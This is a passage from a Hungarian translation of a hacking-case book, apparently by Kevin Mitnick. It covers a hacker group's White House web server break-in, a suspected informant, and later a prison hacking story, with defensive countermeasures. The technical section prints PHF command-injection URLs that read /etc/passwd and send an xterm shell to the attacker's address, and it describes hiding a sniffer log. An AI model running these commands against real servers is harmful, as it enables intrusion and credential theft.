mintaprogram egyik hibájának kiaknázásával; ezt a programot egy
webes telefonkönyv adatbázisához való hozzáférésre használták. Ez
kritikus sebezhetőség volt, és noha a hackerközösség sok tagja tudott
erről, „nem sokan használták ezt”, mondja Zyklon.
Jó néhány műveletet végrehajtva (ezeket a fejezet végén levő
Betekintés részben részletezzük) képes volt rendszergazdai
jogosultságot szerezni a whitehouse.gov szerverhez, és hozzáférést
szerezni a helyi hálózaton levő egyéb rendszerekhez, többek között a
Fehér Ház levelezőszerveréhez. Zyklon ennél a pontnál már képes volt
arra, hogy elolvassa a Fehér Ház személyzete és a nyilvánosság közötti
levélváltásokat, noha ezek az üzenetek természetesen semmilyen
bizalmas információt nem tartalmaztak.
Azonban arra is képes volt, meséli Zyklon, hogy „megszerezze a
jelszó és a shadow fájlok egy másolatát”. Az oldal körül téblábolt,
nézvén, hogy mit tud megszerezni, és várt, amíg az emberek
megérkeztek a munkába. Várakozás közben kapott egy üzenetet
Khalidtól, aki azt mondta, hogy a legfrissebb betörésekről ír egy cikket,
és azt kérdezte Zyklontól, hogy be tud-e számolni valami friss
betörésről. – Elmondtam hát neki, hogy éppen a Fehér Ház web-
oldalán vagyunk – mondta Zyklon.
Néhány órával levélváltás után, meséli Zyklon, látták, hogy egy
sniffer program jelenik meg az oldalon – egy rendszergazda, aki látni
akarta, hogy mi történik, és ki akarta deríteni, hogy kik voltak az
oldalon? Véletlen egybeesés? Vagy volt bármilyen oka a
rendszergazdának arra, hogy az adott pillanatban gyanakodjon
valamire? Hónapokig tartott, amíg Zyklon megtudta a választ. Akkor,
amint észrevették a sniffert, kihúzták a csatlakozót, eltűntek az oldalról,
és reménykedtek, hogy hamarabb elkapták a rendszergazdát, mint hogy
az észrevehette volna őket.
Azonban darázsfészekbe nyúltak. Körülbelül két héttel később az
FBI akcióba lépett, nyakon csípték az összes gLobaLheLL tagot, akit
képesek voltak azonosítani. Zyklonon túlmenően, aki akkor 19 éves
volt és Washington államban kapták el, elcsípték többek között
MostHateD-et (Patrick Gregory, szintén 19, Texas) és MindPhasr-t
(Chad Davis, Wisconsin).
ne0h azon kevesek közé tartozott, akik túlélték a tisztogatást. Távoli
lakóhelye biztonságában bedühödött, és a következő üzenetet helyezte
el a weboldalon; első szerkesztés után így szólt a szöveg: „Figyeljetek
ti FBI-s k_pecérek. Ne b_a tagjainkkal, mén veszíteni fogtok.
Miközben ezt írom, a kezünkben van az fbi.gov oldal. ÉS FÉLTEK.
Azért tartóztattatok le, mert olyan ostobák vagytok, hogy nem tudjátok,
ki hackelte meg a fehér-házat... Ugye? ezért mindennkit bevittetek,
hátha narkósok vagyunk. KIB_TT SZERENCSE. HOGY MI NEM
NARKÓZUNK. Nem értitek? AZT MONDTAM VILÁGURALOM.”
És így írta alá: „a kíméletlen ne0h”.[9]

Utóhang

Hogyhogy a rendszergazda éppen aznap, olyan korán reggel kezdett


szaglászni? Zyklonnak nincsen kétsége a választ illetően. Amikor az
ügyészek elővették az iratokat az ügyével kapcsolatban, talált egy
megjegyzést, amely szerint a gLobaLheLL Fehér Házba való
betörésével kapcsolatos információ egy FBI informátortól származik.
Ha jól emlékszik, a papírokban az is benne volt, hogy az informátor Új-
Delhiben, Indiában tartózkodott.
Zyklon szerint semmi kétség sincsen. Az egyetlen ember, akinek
beszélt a Fehér Házba való betörésről, az egyetlen személy, Khalid
Ibrahim volt. Egy meg egy az kettő: Khalid FBI informátor volt.
Némi rejtély azért marad. Még ha Zyklonnak igaza is van, ez a teljes
történet? Khalid informátor volt, aki segített az FBI-nak felkutatni a
bizalmas helyekre behatolni hajlandó hackerkölyköket? Vagy van egy
másik lehetséges magyarázat: az informátorként játszott szerepe csak a
történet fele, és valójában pakisztáni terrorista is volt, ahogy azt az
indiai tábornok gondolta róla. Kettős szerepet játszó férfi, aki a Talibán
ügyét segítette, miközben beépült az FBI-ba. Az őt az FBI-nak
feljelentő kölykök miatti aggodalma jól illik a sztorinak ebbe a
változatába.
Csak néhányan tudják az igazságot. A kérdés az, hogy az érintett
FBI ügynökök és szövetségi ügyészek vajon azok közül valók, akik
ismerik a valódi történetet? Vagy ők is át lettek verve?
Végül Patrick Gregoiy és Chad Davis 26 hónapot, míg Zyklon Burns
15 hónapot kaptak. Mind a hárman letöltötték a büntetésüket, és ismét
szabadlábon vannak.

Öt évvel később

Ezek a hackelős napok nagyrészt már csak emlékek Elvtárs számára,


de a hangja sokkal élénkebbé válik, amikor az izgalomról beszél, „amit
az okoz, hogy olyan dolgot csinálsz, amit nem lenne szabad, olyan
helyekre mész, ahova nem lenne szabad, remélve, hogy valami
izgalmas dologba botlasz”.
De itt az idő, hogy elkezdje a rendes életét. Azt mondja, hogy a
főiskolán gondolkodik. Amikor beszéltünk, éppen akkor jött vissza
Izraelből, ottani cserkésziskolákból. A nyelv nem okozott neki
problémát – általános iskolában tanult héberül, és ő maga is
meglepődött azon, hogy mennyi mindenre emlékezett.
Vegyes benyomás alakult ki benne az országról. A lányok „igazán
szuperek” és az izraeliek nagyon szeretik Amerikát. – Úgy tűnik, hogy
felnéznek az amerikaiakra. – Például éppen néhány izraelivel volt, akik
egy olyan üdítőt ittak, amelyről még soha nem hallott, és amit RC
Colának hívtak; kiderült, hogy amerikai termék. Az izraeliek
elmagyarázták neki: – A reklámokban az amerikaiak ezt isszák. –
Találkozott „Amerika-ellenes hangulattal is olyan emberek részéről,
akik nem értenek egyet a politikával”, de nem vette különösen a
szívére: – Gondolom, ilyennel bárhol lehet találkozni.
Az időjárást viszont gyűlölte – „hideg és esős” volt, amíg ott
tartózkodott. És akkor még ott volt a számítógép kérdése. Kifejezetten
az utazás miatt vett egy laptopot, amely látja a vezetéknélküli
hálózatokat, de azt tapasztalta, hogy „az épületeket abból a nagyon
vastag kőből építették”. A számítógépe 5-10 hálózatot látott, de a jelek
túl gyengék voltak a kapcsolathoz, így 20 percet kellett sétálnia egy
olyan helyre, ahol be tudott jelentkezni.
Szóval Elvtárs újból Miamiban van. A büntetett előéletű tinédzser az
örökségéből él, próbál dönteni a főiskoláról. Húsz éves, és
tulajdonképpen semmit nem csinál.
Elvtárs régi cimborája, ne0h egy nagy telefontársaságnak dolgozik (a
kilenctől-ötig meló „nem jó”, mondja), de hamarosan Los Angelesbe
megy három hónapra, ahol fizikai munkát fog végezni; azért vállalja,
mert sokkal többet fog keresni, mint jelenleg. Reméli, hogy eleget félre
tud tenni ahhoz, hogy lefoglalózzon egy házat abban a közösségben,
ahol jelenleg lakik.
Amikor a három hónapos jól fizető kulimunka véget ér, ne0h is
elgondolkodik majd azon, hogy elkezdjen egy főiskolát – de
semmiképpen sem informatikát fog tanulni. – A legtöbb diplomás
informatikus, akivel összefutottam, szart se tud – mondja. Inkább üzleti
és szervezeti menedzsmentre szeretne szakosodni, majd üzleti szinten
kíván a számítástechnikával foglalkozni.
Amikor a régi tetteiről beszéltünk, ismét előjött a Kevin-
komplexusa. Milyen mértékben képzelte, hogy az én nyomdokaimban
jár?
Akartam, hogy elkapjanak? Igen is, meg nem is. Az, hogy elkaptak,
azt mutatja, „meg tudom csinálni, megcsináltam”. Ez persze nem azt
jelenti, hogy szándékosan fogattam el magam. Azért akartam, hogy
elkapjanak, hogy harcolhassak, kiengedjenek, és olyan hacker legyek,
aki megszökött. Kijutok, szerzek egy jó melót egy kormányzati szervnél,
és jól beilleszkedek majd az föld alatti világba.

Milyen nagy a fenyegetés?


Az eltökélt terroristák és a semmitől nem félő kölyökhackerek
kombinációja végzetes lehet az országra nézve. Ez a történet azon
gondolkodtatott el, hogy hány Khalid szaladgálhat kinn, akik
megpróbálnak kölyköket (vagy hackelési ismeretekkel rendelkező
hazafiatlan érzelmű felnőtteket) toborozni, olyanokat, akik pénzre,
személyes elismerésre vagy a nehéz feladatok sikeres teljesítésére
szomjaznak. A későbbi Khalidok sokkal titokzatosabbak és nehezebben
azonosíthatók lesznek.
Amikor a hackeléshez kapcsolódó vádak miatt a tárgyalás előtt
őrizetben voltam, többször megkörnyékezett egy kolumbiai drogbáró.
Életfogytig tartó börtönbüntetésre volt ítélve, és nem volt lehetősége a
feltételes szabadlábra helyezésre. Nagyon vonzó ajánlatot tett: 5 millió
dollárt kapok készpénzben, ha betörök a Sentrybe – a Szövetségi
büntetésvégrehajtó hivatal számítógépes rendszerébe és megszüntetem
a büntetését. A fickó igazi volt és halál komolyan gondolta. Nem
fogadtam el az ajánlatot, de a konfrontáció elkerülése érdekében azt a
benyomást keltettem, hogy segítek neki. Kíváncsi vagyok, ne0h mit tett
volna egy hasonló helyzetben.
Elképzelhető, hogy az ellenségeink nagyon jól kiképzik katonáikat a
kiberhadviselés művészetéből, hogy megtámadják a mi
infrastaiktúránkat, és megvédjék a sajátjukat. Nem nehéz kitalálni,
hogy ez a csoport a világ minden tájáról próbálnak majd hozzáértő
hackereket toborozni, egyrészt képzés, másrészt a kritikus projektek
végrehajtása céljából.
A Védelmi Minisztérium 1997-ben és 2003-ban is végrehajtott egy
olyan műveletet, amelyben a nemzet elektronikai támadással szembeni
sebezhetőségét vizsgálták. A Washington Times-ban[10] publikált
beszámoló szerint „magas rangú Pentagon vezetők is meg voltak
döbbenve azon a katonai gyakorlaton, amely azt mutatta be, hogy a
hackerek milyen könnyen megbéníthatják az USA katonai és civil
számítógépes hálózatait”. A cikk azzal folytatódott, hogy a Nemzeti
Biztonsági Tanács egy csoportot, egy hackerekből álló „vörös csapatot”
állított össze a számítógépes szakembereiből, akik csak bárki számára
elérhető, nem speciális számítógépeket használhattak, illetve olyan
hackereszközöket, kódokat vehettek csak igénybe, amit az Internetről
vagy elektronikus hírlevelekről tölthettek le.
A vörös csapat néhány napon belül beszivárgott a nemzeti
elektromos hálózatot felügyelő számítógépes rendszerekbe, és néhány
paranccsal az ország egész részeit sötétbe boríthatták volna. – Ha a
gyakorlat valódi lett volna – írta a Christian Science Monitor szaklap –,
megbonthatták volna a Védelmi Minisztérium kommunikációs
rendszereit (kivehették volna a csendes-óceáni parancsnokságot), és
hozzáférést szerezhettek volna a haditengerészet hajóin levő
számítógépes rendszerekhez[11].
Saját személyes tapasztalatom, hogy korábban képes voltam több
telefontársaság távbeszélő központjához hozzáférni. Egy évtizeddel
ezelőtt teljes ellenőrzésem alatt tarthattam a Pacific Bell, Sprint, GTE
és egyéb társaságok által üzemeltetett legtöbb központot. Gondoljunk
bele, milyen zűrzavart képes okozni egy erőforrásokkal bőségesen
rendelkező terrorista csoport, amely hasonló szintű hozzáférést szerez!
Feljegyzések készültek az al-Kaida és egyéb terrorista csoportok
tagjairól, arról, hogy hogyan használták a számítógépes hálózatokat a
terrorcselekmények megtervezésére. A bizonyítékok azt sugallják,
hogy a terroristák az Internetet is használták a szeptember 11-i
támadások műveleteinek megtervezésekor
Senki sem tagadja, hogy Khalid Ibrahimnak sikerült fiatal
hackereken keresztül információhoz jutnia. Arra, hogy valóban köze
volt-e a Világkereskedelmi Központ és a Pentagon elleni
támadásokhoz, nincsen meggyőző bizonyíték. Azonban senki nem
tudja, hogy mikor fog ő vagy az ő fajtája ismét felbukkanni a
kibertérben, olyan naiv segítők után kutatva, akik izgalmat találnak
abban, hogy „olyan dolgot csinálnak, amit nem lenne szabad, olyan
helyekre mennek, ahova nem lenne szabad”. A kölykök úgy
gondolhatják, hogy a felkínált kihívás „frankó”.
A gyenge biztonság örök meghívó lesz a fiatal hackerek számára. Az
ebben a történetben szereplő hackereknek ettől függetlenül fel kellett
volna ismerniük annak veszélyét, hogy egy külföldi személy titkos
amerikai számítógépes hálózatok feltörésére biztatja őket. Azon
gondolkodom, vajon hány ne0h-t toboroztak már ellenségeink.
A jó biztonság soha nem volt fontosabb, mint a terroristák által
lakott világunkban.

BETEKINTÉS

ne0h közölt velünk néhány részletet arra vonatkozóan, hogyan


hackelt be a Lockheed Martin számítógépes rendszereibe. A történet a
hackerek találékonyságának tanúbizonysága („Ha bármi hiba van a
biztonságban, mi megtaláljuk azt” – ez lehetne a hackerek mottója), és
egyben tanmese minden szervezet számára.
Gyorsan rájött, hogy a Lockheed Martin saját domain névszervert
(DNS) futtatott. A DNS az az Internet protokoll, amely lefordítja
(„feloldja”) például a www.disney.com címet 198.187.189.55-re,
vagyis egy olyan címre, amelyet fel lehet használni az üzenetcsomagok
irányítására. ne0h tudta, hogy egy lengyel biztonsági kutatócsoport egy
hackerek által exploitnak nevezett programot jelentetett meg, amellyel
kihasználhatja a DNS Lockheed által futtatott változatának
gyengeségeit. (Az exploit olyan program, amelyet kifejezetten azért
írnak meg, hogy egy adott sebehetőséget szándékosan kihasználjanak.)
A cég a DNS protokollok egy BIND (Berkeley Internet Name
Domain) nevű megvalósítását használta. A lengyel csoport rájött, hogy
a BIND egyik verziója érzékeny a távoli puffertulcsordulást alkalmazó
támadástípusokra, és pontosan ezt a verziót használta a Lockheed
Martin. Az Interneten talált módszert követve ne0h rendszergazdai
jogosultságokat szerzett az elsődleges és másodlagos Lockheed DNS
szervereken.
A rendszergazdai jogosultság megszerzése után ne0h nekilátott,
hogy egy sniffer program telepítésével jelszavakat és e-maileket
hallgasson le. Egy sniffer program úgy működik, mint egy számítógép-
lehallgató. A vezetéken keresztül küldött minden forgalmat titokban
megszerez; a hacker általában egy olyan helyre küldi az adatokat, ahol
valószínűtlen, hogy észrevennék. ne0h elmondta, hogy a sniffer napló
elrejtéséhez egy olyan könyvtárat hozott létre, amelynek egyetlen
szóközből és három pontból állt a neve; az általa használt tényleges
elérési útvonal „var/adm/...” volt. Egy rövid vizsgálat során a
rendszergazda valószínűleg nem figyel fel erre a gyanús elemre.
A sniffer program elrejtésének ezen technikája elég egyszerű, mégis
sok esetben hatásos; léteznek sokkal kifinomultabb technikák is a
hacker nyomainak ilyen helyzetben történő elrejtésére.
Mielőtt kideríthette volna, hogy képes-e mélyebbre hatolni a
Lockheed Martin hálózatába, és titkos információkat megszerezni,
ne0h egy másik feladatot kapott. A Lockheed Martin titkos fájljai
biztonságban maradtak.
A Fehér Ház hackeléséhez Zyklon eredetileg egy CGI (common
gateway interface – általános átjáró felület) szkennernek nevezett
programot futtatott le, amely CGI sebezhetőségek után kutatva
tapogatja le a célrendszert. Rájött, hogy a weboldal PHF exploit
használatával megtámadható; a PHF exploit a PHF (telefonkönyv)
szkript fejlesztője által elkövetett programozói hibát használta ki.
A PHF egy űrlap alapú interfész, amely inputként egy nevet fogad
el, és kikeresi a szerverről a név– és címadatokat. A szkript egy escape
shell cmd() nevű függvényt hívott meg, amelynek a bevitt adatokat
kellett megtisztítania a különleges karakterektől. A programozó egy
karaktert, az új sor karaktert lefelejtette a listájáról. Egy képzett támadó
képes kihasználni ezt a figyelmetlenséget, ha olyan inputot visz be az
űrlapba, amely az új sor karakter kódolt változatát (0x0a) tartalmazza.
Az ezt a karaktert tartalmazó sztring elküldésével a szkript a támadó
által kiválasztott bármely parancs végrehajtására rávehető.
Zyklon a következő URL-t gépelte be a böngészőjébe:
http://www.whitehouse.gov/cgi-bin/phf?Qalias
=x%0a/bin/cat%20/etc/passwd
Ezzel meg tudta jeleníteni a whitehouse.gov jelszófájlját. Ő azonban
teljes ellenőrzést kívánt szerezni a Fehér Ház webszervere felett. Tudta,
hogy nagyon valószínű, hogy az X szerverportokat tűzfallal blokkolják,
amely megakadályozza, hogy a whitehouse.gov bármely ilyen
szolgáltatásához csatlakozzon, így újból a PFH lyukat használta ki
azzal, hogy a következőt irta be:
http://www.whitehouse.gov/cgi-bin/phf?
Qalias=x%0a/usr/XllR6/bin/xterm%20-ut%20-
display%20zyklons.ip.address:0.0
Ezzel az érte el, hogy egy xterm lett a Fehér Ház szerveréről az X
szerven futtató, az ellenőrzése alatt álló számítógépre küldve. Ez azt
jelenti, hogy ahelyett, hogy a whitehouse.gov-hoz csatlakozott volna,
tulajdonképpen azt a parancsot adta a Fehér Ház rendszerének, hogy az
csatlakozzon hozzá. (Ez csak akkor lehetséges, ha a tűzfal engedélyezi
a kimenő kapcsolatokat, és ebben az esetben ez így volt.)
Ezt követően kihasználta a rendszerprogram – az ufsrestore –
puffertúlcsordulásos sebezhetőségét. És ez rendszergazdai
jogosultságot biztosított számára a whitehouse.gov szerveren, illetve
hozzáférést biztosított a Fehér Ház levelezőszerveréhez és a hálózaton
levő egyéb rendszerekhez.

ÓVINTÉZKEDÉSEK
A ne0h és Elvtárs által itt leírt támadások két kérdést vetnek fel
minden cég számára.
Az első egyszerű és már mindenkinek ismerős: minden operációs
rendszernek és alkalmazásnak a legújabb változatát használjuk.
Nagyon lényeges, hogy éberek legyünk, és minden biztonsághoz
kapcsolódó patch-et és javítást telepítsünk. Annak érdekében, hogy ezt
ne vaktában, lesz, ami lesz alapon hajtsuk végre, minden cégnek ki kell
fejlesztenie és alkalmaznia kell egy patchkezelő programot, amely
figyelmezteti az arra hivatott alkalmazottat, amikor új patch-et adnak ki
a cég által használt termékekhez – elsősorban az operációs rendszerhez,
de az alkalmazásszoftverekhez és firmware-ekliez is.
És amikor egy új patch elérhetővé válik, azt a lehető leghamarabb
telepíteni kell – azonnal, kivéve ha az céges műveleteket tenne tönkre:
azonban ilyenkor is az ésszerűen lehető leghamarabb el kell végezni a
telepítést. Nem nehéz megérteni, hogy a túlterhelt alkalmazottak a
látványosabb feladatokra összpontosítanak (például az új alkalmazottak
rendszereinek telepítésére), és csak akkor mennek körbe a patch-eket
telepíteni, amikor arra idejük van. Ám ha egy patch-ekkel el nem látott
gép elérhető az Internetről, az igen kockázatos helyzetet teremt.
Számtalan rendszert törnek fel a patch-kezelés hiánya miatt. Ahogy
egy sebezhetőség nyilvánosságra kerül, a veszélynek való kitettség
jelentősen megnő mindaddig, amíg a fejlesztő ki nem adja a problémát
orvosoló patch-et, és az ügyfelek nem telepítik azt.
A szervezeteknél a patch-ek telepítése magas prioritású feladat kell
hogy legyen, és egy formalizált patch-kezelő folyamatra van szükség,
amely – a kritikus üzleti működés követelményeivel nem ütköző
módon – a lehető leghamarabb csökkenti a veszélynek való kitettség
mértékét.
Azonban nem elegendő, ha éberen figyelünk a patch-ek telepítésére.
ne0h elmondta, hogy sok olyan betörést, amelyben részt vett, „nulladik
napi” exploitok kihasználásával hajtottak végre – ezek olyan
sebezhetőségre alapuló betörések, amelyek a hackercimborák szűk
csoportján kívül senki más számára nem ismertek. A „nulladik nap” az
a nap, amikor először kihasználják a sebezhetőséget, és amikor ebből
kifolyólag a szoftvergyártó és a biztonsági közösség tudomást szerez
erről.
Mivel a nulladik napi támadásnak mindig fennáll a potenciális
veszélye, minden szervezet, amely hibás terméket használ, mindaddig
sebezhető, amíg a patch-et vagy a javítást ki nem adják. Hogyan
csökkenthetjük ennek a kitettségnek a kockázatát?
Úgy gondolom, hogy az egyeden járható megoldás a mélységi
védekezés modellje. Feltételeznünk kell, hogy a nyilvánosan elérhető
számítógépes rendszereink valamikor sebezhetővé válnak egy nulladik
napi támadással szemben. Ezért olyan környezetet kell létrehoznunk,
amely minimalizálja a rossz fiúk által elkövethető kárt. Egy már
korábban említett példa, ha a nyilvánosan elérhető rendszereket a céges
tűzfal DMZ területére helyezzük. A DMZ a demilitarized zone
(demilitarizált övezet) kifejezés katonai/politikai körökben használt
rövidítése, és egy olyan hálózati infrastruktúra felállítására utal,
amelyben a nyilvánosság által elérhető rendszereket (webszerverek,
levelezőszerverek, DNS szerverek és hasonlók) elkülönítjük a céges
hálózaton levő, titkos és bizalmas információkat tartalmazó
hálózatoktól. A belső hálózatot védő hálózati architektúra alkalmazása
a mélységi védekezés egyik példája. Egy ilyen elrendezés esetén, még
ha a hackerek fel is fedeznek egy korábban ismeretlen sebezhetőséget,
és veszélyeztetik is a webszervert vagy a levelezőszervert, a belső
hálózaton levő céges rendszerek egy másik biztonsági réteg által
továbbra is védve vannak.
A cégek további hatásos óvintézkedéseket hajthatnak végre, ha
nyomon követik a szokatlannak vagy gyanúsnak tűnő tevékenységet
folytató hálózati vagy egyéni hostokat. Miután egy támadó sikeresen
feltört egy rendszert, általában bizonyos műveleteket hajt ott végre,
például megpróbál titkosított vagy sima szöveges jelszavakat
megszerezni, hátsó ajtókat telepíteni, konfigurációs fájlokat módosítva
gyengíteni a biztonságot vagy a rendszert, az alkalmazásokat vagy a
naplófájlokat kíséreli meg módosítani. Ha létezik egy az ezeket a
tipikus hackerviselkedéseket figyelő folyamat, amely figyelmezteti az
alkalmazottakat, az segíthet a kár mérséklésében.
Más témában ugyan, de számtalanszor adtam interjút a sajtónak
arról, hogy hogyan lehet a mai ellenséges környezetben a legjobban
védeni az üzleti és a személyi számítógépeinket. Az egyik alapvető
javaslatom a statikus jelszavaknál erősebb formájú hitelesítés
használata. Valószínűleg csak az után fogjuk megtudni, hogy valaki
megszerezte a jelszavunkat, amikor ezzel már visszaélt.
Számtalan második szintű beléptetési technika létezik, amelyek a
hagyományos jelszavakkal párhuzamosan használhatók, és sokkal
nagyobb biztonságot kínálnak. Az RSA korábban említett SecureID
megoldásán túlmenően a SafeWord PremierAccess passcode (ellenőrző
kód) generáló tokeneket, digitális hitelesítőket, smankártyákat,
biometrikát és egyéb hasonló technikákat kínál.
Az ilyen típusú hitelesítés-ellenőrzők használatának hátránya a
nagyobb költség és a minden felhasználót érintő újabb
kényelmetlenség. Minden azon múlik azonban, hogy mit próbálunk
védeni. A statikus jelszavak elegendőek lehetnek a LA Times
weboldalán levő új cikkek védelmére. De megbízna ön a statikus
jelszavakban, ha azok a legújabb repülőgép műszaki leírását védenék?

ZÁRÓJELBEN

Az ebben a könyvben szereplő, illetve a sajtóban megjelenő


történetek az ország számítógépes rendszereinek veszélyeztetettségét,
illetve a támadásnak való kitettségünket, sebezhetőségünket jelzik. Úgy
tűnik, mintha csak nagyon kevés rendszer lenne igazán biztonságos.
A terrorizmus korában egyértelműen jobb munkát kell végeznünk a
lyukak betapasztásában. Az itt ismertetett történetekhez hasonlók olyan
témát hoznak elő, amivel szembe kell nézni: a saját felelőtlen
tinédzsereink tehetsége és tudása ellenünk, társadalmunk
veszélyeztetésére fordítható. Úgy gondolom, hogy a kisiskolásoknak
tanítani kellene a számítógéphasználat etikai kérdéseit, már onnantól
kezdve, hogy általános iskolában találkoznak az informatikával.
Nemrégiben részt vettem egy Frank Abagnale, a híres Kapj el, ha
tudsz című film főszereplőjének előadásán. Frank az ország
középiskolásai között egy kutatást végzett a számítógéphasználat
etikájáról. Minden diákot megkérdezett, hogy ő vajon elfogadható
viselkedésnek tanja-e egy osztálytársa jelszavának feltörését. Meglepő
módon a kutatásban résztvevő diákok 48 százaléka semmi kivetni valót
nem talált ebben. Ilyen hozzáállás mellett nem nehéz megérteni, hogy
hogyan keverednek emberek ilyen típusú dolgokba.
Ha bárkinek van arra vonatkozóan javaslata, hogy hogyan tehetjük
az ifjú hackereket kevésbé fogékonnyá a belföldi vagy külföldi
ellenségeinktől érkező megkeresésekre, kérem, hogy álljon elő, és
tegye közkincsé az ötleteit.

JEGYZETEK
1. „Do Terrorists Troli the Net?” (Nyomot hagynak a terroristák a
Neten?) Nioll McKay, Wired.com, 1998. november 14.
2. McKay cikke az idézett műben.
3. McKay cikke az idézett műben.
4. A sotp.org oldalról a South Asia Intelligence Review.
5. The United States and the Globol Coalition Against Terrorism,
September-December 2001: A Technology, (Az Egyesült Államok és a
globális koalíció a terrorizmus ellen, 2001. szeptember-december:
Kronológia) www.state.gov/r/pa/ho/pubs/fs/5889.htm.
6. Yashwant Deva, Avsm tábornok (lete elnök) beszéde az
„Information Security” (Információ biztonság) conferencián, India
International Centre, New Delhi 2002. november 14.
7. Ennek megerősítése nehézkes. Mivel a támadás a Clinton
kormónyzat alatt történt, az itt felsorolt személyek egyike sem dolgozik
már a Fehér Házbon. Néhány érdekes részlet mindenesetre kideríthető,
Monty Haymes videofelvételeket készített. Christopher Adams a
Financial Times, a brit napilap riportere; amennyire ki tudtuk deríteni,
nem volt ilyen nevű alkalmazott a Fehér Házban. Debra Reid
fényképész az Associated Press-nél. Úgy tűnik, hogy Connie
Colabatistto néven senki sem dolgozott a Fehér Házban; egy ilyen nevű
asszony Gene Colabatistto felesége (vagy volt), aki a Solutions at the
Space Imaging nevű cég elnöke volt, azonban nincsen egyértelmű
kapcsolat, hogy miért lennének a Fehér Ház alkalmazottainak a
listáján.
8.
http://attrition.org/mirror/attrition/1999/05/10/www.whitehouse.gov/mi
rror.html.
9. Az igazolás itt is nehéz. Az idézett szöveg mindenesetre itt
megtekinthető:
http://www.attrition.org/mirror/ottrition/1999/05/26/mmic.snu.ac.kr/.
10. Computer Hackers Could Disable Military; System
Compromised in Secret Exercise” (A számítógépes hockerek
horcképtelenné tehetik a hadsereget; titkos gyakorlattal veszélyeztetett
rendszer). Sertz, Washington Times, 1998. április 17.
11. Wors of the Future... Today” (A jövő háborúi... ma) Tom Regan,
Christian Science Monitor, 1999. június 24.
3. fejezet

A texasi börtönhack
Nem hiszem, hogy bármi mást mondhatunk egy fiatalnak abból a
célból, hogy megváltozzon, mint azt, hogy az értékek benne vannak, és
hogy soha ne válassza a rövidebb utat.
William
Egy verőfényes napon két gyilkosság miatt elítélt fiatal találkozott
egy texasi börtön betonudvarán, és felfedezték, hogy egyformán
rajonganak a számítógépekért. Szövetkeztek, és titkos hackerek lettek
közvetlenül az éber őrök orra előtt. Mindez már a múlt. William Butier
jelenleg minden hétköznap reggel 5 óra 30 perckor beszáll az autójába,
és a zsúfolt houstoni forgalomban megkezdi az ingázást munkahelyére.
Nagyon szerencsésnek tartja magát, hogy egyáltalán életben van. Stabil
barátnője van, csillogó új kocsit vezet. És hozzáteszi: – Nemrégiben
7000 dollár fizetésemelést kaptam. Nem rossz.
Williamhez hasonlóan barátja, Danny is megállapodott, és biztos
állása van az informatika területén. De egyikük sem fogja elfelejteni a
hosszú, lassan múló éveket, amelyekkel nagy árat fizettek tetteikért.
Különös módon a börtönben eltöltött évek során szerezték meg azt a
tudást, amelynek most olyan nagy hasznát veszik a „szabad életben”.

Odabenn; a számítógépek felfedezése

A börtön mindig sokkot jelent az újonnan jövőknek. Az érkező


elítélteket gyakran összezárják, amíg a fékezhetetleneket és
erőszakosokat kiszűrhetik közülük – ez komoly kihívás azoknak, akik
megpróbálnak a szabályok szerint élni. Amikor olyan emberekkel
vannak körülvéve, akik bármilyen vélt sérelem esetén robbanhatnak,
még az engedékenyeknek is keménynek kell lenniük, és ki kell állniuk
magukért. William kidolgozta a saját szabályrendszerét:
Alapjában véve úgy éltem, ahogy ott élni kellett. Csak 177 cm
vagyok, és akkor talán 125 kg voltam. De ez nem csak arról szól, hogy
nagy légynél, azt kell sugallnod, hogy nem vagy gyenge, és senki nem
használhat ki. Én így viselkedtem. Ha bent bárki gyengeséget észlel,
akkor azt kihasználja. Nem hazudtam, nem fecsegtem mások dolgairól,
és te se kérdezz az én dolgomról, mert azt mondom, hogy b_dj meg.
Danny és én is kemény részlegekben voltunk. Tudod, miről beszélek –
gladiátorrészlegek, ahol állandóan harcolni kell. Így egyáltalán nem
érdekeltek az őrök és senki sem. Gondolkodás nélkül harcoltunk, vagy
megtettük, amit meg kellett tennünk.
Amikor William megérkezett, Danny húszéves büntetését töltötte a
Wynne részlegnél, amely a Texas állambeli Huntsville egyik börtöne.
Első munkájának semmi köze nem volt a számítógépekhez.
Először egy olyan részlegbe küldtek, ahol kezdetben a farmokon
kellett a földeken dolgozni. Fel– és lemész a sorok közt kapálva.
Használhatnának gépeket erre a munkára, de nem teszik – ez egyfajta
büntetés, így akármilyen munkát kapsz később, azt jobbnak fogod
találni.
Amikor Dannyt átkerült a Wynne részlegbe, hálás volt, hogy irodai
munkára rendelték a Szállítási Hivatalba. – Egy Olivetti gépen kezdtem
a munkát, amelyhez egy monitor és néhány merevlemez tartozott. DOS
futott rajta, és nagyon kevés volt a memóriája. Piszmogtam vele,
megpróbáltam rájönni, hogyan kell használni. – (Ez nekem is ismerős:
az általam használt első számítógép egy Olivetti teletype volt 110
baudos akusztikus csatoló modemmel.)
Talált egy régi, elfekvő számítógépes könyvet, egy korai adatbázis-
kezelő program, a dBase III használati kézikönyvét. – Rájöttem, hogy
vigyem be a jelentéseket dBase-be, miközben mindenki más gépelte be
a sajátjait. – dBase-be konvertálta az iroda megrendeléseit, és
hozzákezdett egy olyan program elkészítéséhez, amely a farm
termékeinek a börtön által az állam más börtöneibe történő szállítását
követte nyomon.
Végül Danny bizalmi státusba került, amely magasabb bizalmi
szintű munkakörrel és „kapuigazolvánnyal” járt, és lehetővé tette, hogy
a börtön védett területén kívül dolgozzon. A szállítóirodában kapott
munkát, amely a kerítésen kívül egy kamionban volt berendezve, és ott
az élelmiszereket szállító teherautók számára készítette elő a szállítási
megrendeléseket. De ami igazán számított, az az, hogy a munka „a
számítógépekhez való első igazi hozzáférést jelentette” a számára.
Egy idő múlva kapott egy kis szobát a kamionban, és a hardverekért
lett felelős – új gépek összeszerelése és a meghibásodottak javítása. Itt
egy vissza nem térő lehetőséget kapott: saját tapasztalatai alapján
tanulta meg a számítógépek összeszerelését és javítását. Néhány ember,
akikkel együtt dolgozott, számítógépes könyveket hozott neki, és ez
gyorsította a tanulási folyamatot.
Az, hogy a hardverekért volt felelős, hozzáférést biztosított „egy
polcnyi, leltárban nem szereplő számítógépes alkatrészhez”. Rövid idő
alatt meglehetős ügyességre tett szert a gépek összeszerelésében és
alkatrészek hozzáadásában. A börtönszemélyzet még csak meg sem
vizsgálta, hogyan konfigurálta a rendszereket, így könnyedén
összeállíthatott olyan gépeket, amelyekben ellenőrizetlen alkatrészek
voltak.

A szövetségi börtönök nem ilyenek

Ez a fajta gondatlanság, amivel a rab találkozott, szövetségi


börtönökben nem valószínű. A U.S. Bureau of Prisons (Amerikai
Börtönhivatal) igen magas szintű paranoiáról tett tanúbizonyságot a
